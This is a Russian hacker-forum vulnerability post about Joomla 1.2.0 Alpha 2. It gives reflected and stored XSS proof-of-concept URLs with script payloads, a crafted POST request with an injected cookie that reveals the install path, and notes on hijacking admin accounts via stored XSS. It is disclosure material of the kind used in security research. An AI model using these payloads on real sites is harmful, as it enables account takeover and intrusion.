Ууу, как загорелись мои глазки при виде спец хакера за май. От чего же? Да потому что он про Web-coding и я нутром чувствовал, что там должны быть свеженькие cms, свежезалатанные, или ещё не осквернённые рукой хакера движки! Так и вышло. Первой мне приглянулась Joomla v1.2.0 Alpha 2... Вот он результат моих поисков: .........:: Passive XSS ::......... . . . 1) http://ya.ru/joomla/index.php?option=com_syndicate&feed=<script>alert("b00zy_c0d3r loves the bugZzzz=)")</script>&type=com_frontpage&Itemid=1 . . Кусок бажного кода: Code: function saveFeed($filename="", $displayContents=true) { if ($filename=="") { $filename = $this->_generateFilename(); } $feedFile = fopen($filename, "w+"); if ($feedFile) { fputs($feedFile,$this->createFeed()); fclose($feedFile); if ($displayContents) { $this->_redirect($filename); } } else { echo "<br /><b>Error creating feed file, please check write permissions.</b><br />"; } } . . .2) http://ya.ru/joomla/index.php?option=com_registration&task=lostPassword&josmsg=<script>alert('b00zy_c0d3r loves the bugZzzz=)')</script> . ............................................... .........:: Trash ::......... . . . 3) Передаём такой пакет: (вроде можно так и через куки, но я поленился проверять =]) . Code: POST /_путь_к_joomla/administrator/index2.php HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-icq, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://хакаемый сайт/joomla/administrator/index2.php?option=com_messages Accept-Language: ru Content-Type: application/x-www-form-urlencoded User-Agent: lol Host: хакаемый сайт Content-Length: 99 Pragma: no-cache Cookie: _тут_все_куки_от_вашего_пользователя_И_ещё_в_добавок_это ba56d3c5bf76823460c6eeba08991f74=' Connection: Keep-Alive user_id_to=62&subject=xss_field_1&message=xss_field_2&user_id_from=62&option=com_messages&task=save . . . . В итоге получаем ошибку и немедленный редирект на другую страницу. Возвращаемся назад на страницу . с ошибкой и можем видеть установочный путь... ...................................... .........:: BuGzz in Admin's Panel ::......... . . . 4) http://ya.ru/joomla/administrator/index2.php?option=com_users&search="><script>alert(/b00zy_c0d3r/)</script> . 5) Активная XSS присутствует в личных сообщения для админов. (Проще говоря - ПМ в админке). . Уязвимо поле "Subject" . 6) Перейдя в админке по этому адресу: . http://ya.ru/joomla/administrator/index2.php?option=com_admin&task=sysinfo , можно получить . разную системную инфу. Так вот вместе с ней там есть определение версии браузера... Ох, как я . устал, но я всёравно люблю эту багу =). Подменив прогой RMOS Change версию (http-заголовке) вашего . браузера на XSS-сплойт, можно получить активную XSS на той самой страничке админу . на память. ........................................................ .........:: Вкусняшка (Active XSS) ::......... . . . 7) Активная XSS присутствует в профиле пользователя в поле "name" (не путать с "username"). . . Подслащает наш пир то, что, находясь в админке мы можем свободно добавлять новых или изменять . данные старых пользователей без подтверждающих паролей! Т.е. тот же пароль админа мы вмиг можем . поменять на любой другой =). . А вот и горчинка: ограничение на количество вводимых символов уязвимой переменной - 39 символов. . .......................................................... Тут багтраку и КанеЦъ, ставишь плюсик - мАлАдЕцЪ =) З.Ы. Или это карма какая или что, но опять обошлось без инклудов и скул-инъекций =(.. Эххх З.З.Ы На очереди следуюсчая cms из диска
